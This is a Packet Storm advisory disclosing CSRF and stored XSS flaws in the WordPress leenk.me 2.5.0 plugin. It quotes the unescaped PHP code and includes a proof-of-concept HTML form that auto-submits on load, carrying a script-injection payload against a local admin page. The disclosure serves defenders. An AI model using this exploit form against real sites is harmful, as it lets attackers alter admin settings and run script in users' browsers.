Twenty Year Anniversary

WordPress leenk.me 2.5.0 Cross Site Request Forgery / Cross Site Scripting

WordPress leenk.me 2.5.0 Cross Site Request Forgery / Cross Site Scripting
Posted Apr 18, 2016
Authored by cor3sm4sh3r

WordPress leenk.me plugin version 2.5.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | c49ac97d5ce5c1b793c9a108d4da8637

WordPress leenk.me 2.5.0 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
I would like to disclose CSRF and stored XSS vulnerability in Wordpress
plugin LeenkMe version 2.5.0.

The plugin can be found at https://wordpress.org/plugins/leenkme/

In the page wp-content/plugins/leenkme/facebook.php

XSS vulnerable Fields are :

- facebook_message
- facebook_linkname
- facebook_caption
- facebook_description
- default_image
- _wp_http_referer


This CSRF is tested on latest wordpress installation 4.4.2 using firefox
browser.

The Code for CSRF.html is

<html>
<body onload="document.forms['xss'].submit()" >
<form name="xss" action="
http://127.0.0.1/wp/wp-admin/admin.php?page=leenkme_facebook" method="POST">
<input type="hidden" name="facebook_profile" value="on" />
<input type="hidden" name="fb_publish_wpnonce" value="" />
<input type="hidden" name="_wp_http_referer" value="XSS" />
<input type="hidden" name="facebook_message" value="XSS" />
<input type="hidden" name="facebook_linkname" value="XSS" />
<input type="hidden" name="facebook_caption" value="XSS" />
<input type="hidden" name="facebook_description" value="
</textarea><script>prompt();</script>" />
<input type="hidden" name="default_image" value="XSS" />
<input type="hidden" name="message_preference" value="author" />
<input type="hidden" name="clude" value="in" />
<input type="hidden" name="publish_cats[]" value="0" />
<input type="hidden" name="update_facebook_settings"
value="Save Settings" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>


The vulnerable page is

wp-content/plugins/leenkme/facebook.php

The vulnerable code producing XSS is


if ( !empty( $_REQUEST['facebook_message'] ) )
$user_settings['facebook_message'] = $_REQUEST['facebook_message'];
else
$user_settings['facebook_message'] = '';
if ( !empty( $_REQUEST['facebook_linkname'] ) )
$user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname'];
else
$user_settings['facebook_linkname'] = '';
if ( !empty( $_REQUEST['facebook_caption'] ) )
$user_settings['facebook_caption'] = $_REQUEST['facebook_caption'];
else
$user_settings['facebook_caption'] = '';
if ( !empty( $_REQUEST['facebook_description'] ) )
$user_settings['facebook_description'] = $_REQUEST['facebook_description'];


-------------------------
-------------------------
-------------------------
snip
------------------------
-------------------------
--------------------------

<td><textarea name="facebook_message" style="width: 500px;"
maxlength="400"><?php
echo $user_settings['facebook_message']; ?></textarea></td>
</tr>
<tr>
<td><?php _e( 'Default Link Name:', 'leenkme'
); ?></td>
<td><input name="facebook_linkname"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_linkname']; ?>" maxlength="100"/></td>
</tr>
<tr>
<td><?php _e( 'Default Caption:', 'leenkme' );
?></td>
<td><input name="facebook_caption"
type="text" style="width: 500px;" value="<?php echo
$user_settings['facebook_caption']; ?>" maxlength="100"/></td>
</tr>
<tr>
<td style='vertical-align: top; padding-top:
5px;'><?php _e( 'Default Description:', 'leenkme' ); ?></td>
<td><textarea name="facebook_description"
style="width: 500px;" maxlength="300"><?php echo
$user_settings['facebook_description']; ?></textarea></td>


The code used to protect against CSRF that is the anti csrf token used is

<?php wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ); ?>


But this code is not protecting against the CSRF, the form get submitted
successfully with out any error even though the fb_publish_wpnonce is kept
empty resulting in CSRF vulnerability.



# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

April 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    5 Files
  • 2
    Apr 2nd
    17 Files
  • 3
    Apr 3rd
    11 Files
  • 4
    Apr 4th
    21 Files
  • 5
    Apr 5th
    17 Files
  • 6
    Apr 6th
    12 Files
  • 7
    Apr 7th
    1 Files
  • 8
    Apr 8th
    6 Files
  • 9
    Apr 9th
    21 Files
  • 10
    Apr 10th
    18 Files
  • 11
    Apr 11th
    42 Files
  • 12
    Apr 12th
    7 Files
  • 13
    Apr 13th
    14 Files
  • 14
    Apr 14th
    1 Files
  • 15
    Apr 15th
    1 Files
  • 16
    Apr 16th
    15 Files
  • 17
    Apr 17th
    20 Files
  • 18
    Apr 18th
    24 Files
  • 19
    Apr 19th
    20 Files
  • 20
    Apr 20th
    7 Files
  • 21
    Apr 21st
    10 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close